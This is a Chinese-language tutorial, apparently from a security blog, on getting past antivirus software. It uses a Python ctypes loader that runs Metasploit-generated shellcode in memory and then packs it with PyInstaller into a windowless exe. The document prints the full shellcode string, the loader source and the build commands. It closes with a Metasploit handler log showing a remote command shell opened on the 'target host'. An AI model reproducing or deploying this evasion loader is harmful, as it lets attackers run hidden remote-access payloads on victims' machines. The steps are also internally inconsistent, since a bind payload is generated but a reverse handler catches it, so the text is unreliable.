绕过杀毒软件,有很多钟方法。此处介绍一种,编写python程序调用shellcode,并使用Pyinstaler将python程序编译为exe程序。 |
准备工作:(Windows XP环境下编译) |
将Python程序编译为exe,须要Python主程序,pywin32库,Pyinstaller(直接解压到C盘)。 假设编译过程中出现错误提示,请依照指示解决这个问题。 安装过程不是非常复杂,在此不予说明。 |
https://www.python.org/ftp/python/2.7.8/python-2.7.8.msi http://softlayer-dal.dl.sourceforge.net/project/pywin32/pywin32/Build%20219/pywin32-219.win32-py2.7.exe https://pypi.python.org/packages/source/P/PyInstaller/PyInstaller-2.1.tar.gz
|
利用metasploit生成shellcode。供后面的python程序使用。 |
msf payload(shell_bind_tcp) > show options Module options (payload/windows/shell_bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC seh yes Exit technique (accepted: seh, thread, process, none) LPORT 4444 yes The listen port RHOST 0.0.0.0 no The target address msf payload(shell_bind_tcp) > generate -b 'x00' -f /home/nixawk/bind_tcp.txt -p windows -t c [*] Writing 1803 bytes to /home/nixawk/bind_tcp.txt...
|
准备完毕后。python程序源代码例如以下: |
from ctypes import * shellcode = 'xfcxe8x86x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx8bx4cx10x78xe3x4ax01xd1x51x8bx59x20x01xd3x8bx49x18xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8bx12xebx89x5dx68x33x32x00x00x68x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8x90x01x00x00x29xc4x54x50x68x29x80x6bx00xffxd5x50x50x50x50x40x50x40x50x68xeax0fxdfxe0xffxd5x97x6ax05x68xc0xa8x01x6bx68x02x00x11x5cx89xe6x6ax10x56x57x68x99xa5x74x61xffxd5x85xc0x74x0cxffx4ex08x75xecx68xf0xb5xa2x56xffxd5x6ax00x6ax04x56x57x68x02xd9xc8x5fxffxd5x8bx36x6ax40x68x00x10x00x00x56x6ax00x68x58xa4x53xe5xffxd5x93x53x6ax00x56x53x57x68x02xd9xc8x5fxffxd5x01xc3x29xc6x85xf6x75xecxc3' memorywithshell = create_string_buffer(shellcode, len(shellcode)) shell = cast(memorywithshell, CFUNCTYPE(c_void_p)) shell()
|
利用Pyinstaller编译上述包括shellcode的python文件,命令例如以下: |
C:PyInstaller-2.1utils>pythonmakespec.py --onefile --noconsole shellcode.py |
wrote C:PyInstaller-2.1utilsshellcode.spec now run pyinstaller.py to build the executable |
C:PyInstaller-2.1utils>pythonbuild.py shellcode.spec |
59 INFO: Testing for ability to set icons, version resources... 69 INFO: ... resource update available 79 INFO: UPX is not available. 109 INFO: Processing hook hook-os 259 INFO: Processing hook hook-time 259 INFO: Processing hook hook-cPickle 349 INFO: Processing hook hook-_sre 509 INFO: Processing hook hook-cStringIO 639 INFO: Processing hook hook-encodings 660 INFO: Processing hook hook-codecs 1171 INFO: Extending PYTHONPATH with C:PyInstaller-2.1utils 1171 INFO: checking Analysis 1171 INFO: building Analysis because out00-Analysis.toc non existent 1171 INFO: running Analysis out00-Analysis.toc 1171 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable 1171 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ... 1171 WARNING: Assembly not found 1180 ERROR: Assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww not found 1220 WARNING: lib not found: MSVCR90.dll dependency of C:Python27python.exe 1230 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ... 1230 WARNING: Assembly not found 1230 ERROR: Assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww not found 1351 WARNING: lib not found: MSVCR90.dll dependency of C:WINDOWSsystem32python27.dll 1351 INFO: Analyzing C:PyInstaller-2.1PyInstallerloader\_pyi_bootstrap.py 1381 INFO: Processing hook hook-os 1401 INFO: Processing hook hook-site 1421 INFO: Processing hook hook-encodings 1562 INFO: Processing hook hook-time 1562 INFO: Processing hook hook-cPickle 1661 INFO: Processing hook hook-_sre 1822 INFO: Processing hook hook-cStringIO 1961 INFO: Processing hook hook-codecs 2463 INFO: Processing hook hook-pydoc 2632 INFO: Processing hook hook-email 2713 INFO: Processing hook hook-httplib 2763 INFO: Processing hook hook-email.message 2844 INFO: Analyzing C:PyInstaller-2.1PyInstallerloaderpyi_importers.py 2904 INFO: Analyzing C:PyInstaller-2.1PyInstallerloaderpyi_archive.py 2963 INFO: Analyzing C:PyInstaller-2.1PyInstallerloaderpyi_carchive.py 3043 INFO: Analyzing C:PyInstaller-2.1PyInstallerloaderpyi_os_path.py 3043 INFO: Analyzing shellcode.py 3114 INFO: Hidden import 'codecs' has been found otherwise 3114 INFO: Hidden import 'encodings' has been found otherwise 3114 INFO: Looking for run-time hooks 3154 WARNING: lib not found: MSVCR90.dll dependency of C:Python27DLLsselect.pyd 3203 WARNING: lib not found: MSVCR90.dll dependency of C:Python27DLLsunicodedata.pyd 3273 WARNING: lib not found: MSVCR90.dll dependency of C:Python27DLLs\_hashlib.pyd 3323 WARNING: lib not found: MSVCR90.dll dependency of C:Python27DLLsz2.pyd 3414 WARNING: lib not found: MSVCR90.dll dependency of C:Python27DLLs\_ssl.pyd 3484 WARNING: lib not found: MSVCR90.dll dependency of C:Python27DLLs\_ctypes.pyd 3555 WARNING: lib not found: MSVCR90.dll dependency of C:Python27DLLs\_socket.pyd 3575 INFO: Using Python library C:WINDOWSsystem32python27.dll 3625 INFO: Warnings written to C:PyInstaller-2.1utilsuildshellcodewarnshellcode.txt 3634 INFO: checking PYZ 3634 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing 3634 INFO: building PYZ (ZlibArchive) out00-PYZ.toc 4815 INFO: checking PKG 4815 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing 4815 INFO: building PKG (CArchive) out00-PKG.pkg 6167 INFO: checking EXE 6167 INFO: rebuilding out00-EXE.toc because shellcode.exe missing 6167 INFO: building EXE from out00-EXE.toc 6167 INFO: Appending archive to EXE C:PyInstaller-2.1utilsdistshellcode.exe |
编译完毕后,将shellcode.exe放到目标主机上运行,成功获取反弹shell。 |
msf exploit(handler) > set payload windows/shell/reverse_tcp payload => windows/shell/reverse_tcp msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (accepted: seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > set LHOST 192.168.1.107 LHOST => 192.168.1.107 msf exploit(handler) > run [*] Started reverse handler on 192.168.1.107:4444 [*] Starting the payload handler... [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (267 bytes) to 192.168.1.112 [*] Command shell session 1 opened (192.168.1.107:4444 -> 192.168.1.112:2061) at 2014-08-28 12:51:54 +0800 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:PyInstaller-2.1utils> |
參考链接:
http://pen-testing.sans.org/blog/pen-testing/2011/10/13/tips-for-evading-anti-virus-during-pen-testing
https://community.rapid7.com/community/metasploit/blog/2014/03/26/new-metasploit-49-helps-evade-anti-virus-solutions-test-network-segmentation-and-increase-productivity-for-penetration-testers
http://www.scriptjunkie.us/2011/04/why-encoding-does-not-matter-and-how-metasploit-generates-exes/
http://schierlm.users.sourceforge.net/avevasion.html
http://www.pentestgeek.com/2012/01/25/using-metasm-to-avoid-antivirus-detection-ghost-writing-asm/